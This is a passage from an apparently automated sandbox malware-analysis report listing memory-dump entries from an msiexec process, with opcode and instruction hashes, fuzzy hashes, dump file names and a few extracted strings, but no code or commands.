                                                                                                                                • Instruction ID: 68f0a0e04b2565e8719e93170149dc74bb20a51cc54c411d9e13f2db94ca88d8
                                                                                                                                • Opcode Fuzzy Hash: 78348fcd12eceea757b0f93d1a0d4d55ec0edbf8cf49b3a88ae5461130513913
                                                                                                                                • Instruction Fuzzy Hash: 682108317006158FCB1A9B29C85492EB7A7EFD57947144468DA1BCB354CF34DC02CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cfdb10b704ef533e0494c1d1ff9f1c03d352e877060a7b36db2d6020a1f8bbfa
                                                                                                                                • Instruction ID: a94cbbf03697597b9884997070525e486c0498bbafb57ba105f97c1213b34cab
                                                                                                                                • Opcode Fuzzy Hash: cfdb10b704ef533e0494c1d1ff9f1c03d352e877060a7b36db2d6020a1f8bbfa
                                                                                                                                • Instruction Fuzzy Hash: FF117F72B10604ABCF108F54CC45FDDBBB6BB8C750F148025EA16A7290DB75AC11CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 89f755a507c216c9d54a553fa7d121ef0e8865ed4b253bddc5688a401c28bd4c
                                                                                                                                • Instruction ID: bd60b659fe8cd04f518df0f60f3ee26395b8d16474dfcc1da0554b58dd65eacd
                                                                                                                                • Opcode Fuzzy Hash: 89f755a507c216c9d54a553fa7d121ef0e8865ed4b253bddc5688a401c28bd4c
                                                                                                                                • Instruction Fuzzy Hash: 6C21CDB0D002099FDB0ADFACCA9469EBFF2FB41300F1096A9C1549B3A5EB345A05CF80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 40924439ee36885e932f09d9aa3ee708de27ed3b40cbf9c66f7fe880ce08b270
                                                                                                                                • Instruction ID: 6f874b7a480c96206cc17a9617b721483557e27c679fded71df0bb3c63971b1e
                                                                                                                                • Opcode Fuzzy Hash: 40924439ee36885e932f09d9aa3ee708de27ed3b40cbf9c66f7fe880ce08b270
                                                                                                                                • Instruction Fuzzy Hash: A41129B0D002099FCB45EFA9DA9469EBBF2FB44300F1095A9C1199B265EB745A458F81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 79f4553ec037456b37d0640bb1794030895a1c3c3460f943e9e9beaa0ae654e1
                                                                                                                                • Instruction ID: 37c4aa1a127910bcdef0a02f470462e781bb810f8daf585eb04794fef71877ed
                                                                                                                                • Opcode Fuzzy Hash: 79f4553ec037456b37d0640bb1794030895a1c3c3460f943e9e9beaa0ae654e1
                                                                                                                                • Instruction Fuzzy Hash: 5B21C274D1060A8FCB05EFA9D944AEEBBF5FB09300F10452AD915B3210EB345A95CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c95930fca1452a60e8bab561b2630736d8845e54fbdbb494280c2c7fb3b18d1
                                                                                                                                • Instruction ID: b3357b01010e8bbfd57a6dbf66163acd4790b6743a5df2deb5d5d9ceb0c0c9bf
                                                                                                                                • Opcode Fuzzy Hash: 9c95930fca1452a60e8bab561b2630736d8845e54fbdbb494280c2c7fb3b18d1
                                                                                                                                • Instruction Fuzzy Hash: 77012832B001146BCF029EA8DC50BAF3BABDBC8790F148025F706C7240CE759D129B90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d5eaa85778535afd1cfeaa4bbf9c76ef619861526ed4e5bb5f665d44c8ff5134
                                                                                                                                • Instruction ID: 14018f8961c70613e10df7553b31a10e4d058cf535a70729ae5002ebc76ae1c1
                                                                                                                                • Opcode Fuzzy Hash: d5eaa85778535afd1cfeaa4bbf9c76ef619861526ed4e5bb5f665d44c8ff5134
                                                                                                                                • Instruction Fuzzy Hash: 62011B74D0020A9FDF05CFA8D5596EEBBB1FB48310F104429DA14A3350D7345A16CF81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0663c93052b8ccd77deb604572a38beed7b8e0985c403504c34888f8303e70d8
                                                                                                                                • Instruction ID: 927e3f22e51b350ddc25147ee9d0365f685b1c68b03477056b8b38537dd29c52
                                                                                                                                • Opcode Fuzzy Hash: 0663c93052b8ccd77deb604572a38beed7b8e0985c403504c34888f8303e70d8
                                                                                                                                • Instruction Fuzzy Hash: 33E04F32D2026A56CB01EBA1EC456DEBB38EF96614F944962D56437400EB307669C6A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 83759f0ec8055dcd7620f095b159c5f1eacd090e2d93acd3ccde7898c74582f8
                                                                                                                                • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                • Opcode Fuzzy Hash: 83759f0ec8055dcd7620f095b159c5f1eacd090e2d93acd3ccde7898c74582f8
                                                                                                                                • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8871704984041cd98f960fde8daea62449e040fcdaf5af986962ffcca6f7e317
                                                                                                                                • Instruction ID: 40f86f28750b92b4e8baa1440ae78c13b3a0afcd3a4a7fa174a0293fc2665709
                                                                                                                                • Opcode Fuzzy Hash: 8871704984041cd98f960fde8daea62449e040fcdaf5af986962ffcca6f7e317
                                                                                                                                • Instruction Fuzzy Hash: 34D0E235E1040CCBCF20DFA9E8848DCBB71EB48321B10502ADA25A3252DA345851CF00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1c79a85329ccecb92d0d69a7502a6f67cacae7535fd9a52b9aa10a08a75e5aba
                                                                                                                                • Instruction ID: bc6dc5d8b8cda3d995daf7e9614844fac8001521ae3f8ffedefbac19e83ba4e8
                                                                                                                                • Opcode Fuzzy Hash: 1c79a85329ccecb92d0d69a7502a6f67cacae7535fd9a52b9aa10a08a75e5aba
                                                                                                                                • Instruction Fuzzy Hash: 51D0673AB40058DFCB149F99EC40CDDF7B6FB98221B148116EA15A3261CA319925DB54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6664e077aa4883b5b54a352899f01be73c0ecdaabf967ad29823141a3e5d94be
                                                                                                                                • Instruction ID: e0cbc8dc061267ad3d0ffc34afcf3e513432071232db6d3d9ae0dc3d2c2e820f
                                                                                                                                • Opcode Fuzzy Hash: 6664e077aa4883b5b54a352899f01be73c0ecdaabf967ad29823141a3e5d94be
                                                                                                                                • Instruction Fuzzy Hash: 92C012304843084EC645E769DD59955B76FA6802007509620D2050A66EDF7859894F90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                • API String ID: 0-879173519
                                                                                                                                • Opcode ID: 9dbbcb6dcc9baef722816623b16b15c3a71e1621374c1b2383894706e93462d7
                                                                                                                                • Instruction ID: 8c54ee3c67c17b3c98a21b7e6e5c096b5e1147eaf3fa86a0c11460eed40652f7
                                                                                                                                • Opcode Fuzzy Hash: 9dbbcb6dcc9baef722816623b16b15c3a71e1621374c1b2383894706e93462d7
                                                                                                                                • Instruction Fuzzy Hash: 03E12A31E00219DFDF16DFA9C984AADFBB2BF88384F158065E906AB265D730E841CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e403a0d23612977a7063f3b076653bc7d0ad181f9f1c2395df7d7ab7a68df95c
                                                                                                                                • Instruction ID: 6731535f4976eb998c45d318c029c4caf6cabdedffa97981018368f3733d9fcd
                                                                                                                                • Opcode Fuzzy Hash: e403a0d23612977a7063f3b076653bc7d0ad181f9f1c2395df7d7ab7a68df95c
                                                                                                                                • Instruction Fuzzy Hash: B5514771D01208CBDF16EFA9C9887DDBBB2BF89340F14D229D606AB694DB359881CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbd50f3f0c7187051c27fe60d5074f239be756487c60ad05e1afb9402c1c5e6c
                                                                                                                                • Instruction ID: 9098b001d645838e6cfec8f176d1776fea154d85c854069cb2a9b79036c65cf6
                                                                                                                                • Opcode Fuzzy Hash: dbd50f3f0c7187051c27fe60d5074f239be756487c60ad05e1afb9402c1c5e6c
                                                                                                                                • Instruction Fuzzy Hash: E5511570E01218CFDF16DFA8D5887ADBBB2BF49354F209219D216AB684D7359881CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                • API String ID: 0-3001612457
                                                                                                                                • Opcode ID: 2af3ef0980c6da25ddb741617409720a33641dd2780bf16f20abfd4ecde549b2
                                                                                                                                • Instruction ID: eac3cc1a84da2dbb22483cac21a205656304a305653561dd37229b2fbb5ff543
                                                                                                                                • Opcode Fuzzy Hash: 2af3ef0980c6da25ddb741617409720a33641dd2780bf16f20abfd4ecde549b2
                                                                                                                                • Instruction Fuzzy Hash: 9D019E32B401088F8F298E2CC564A2D33EEABB8AA07154469E647CF3B4DA21DC41C750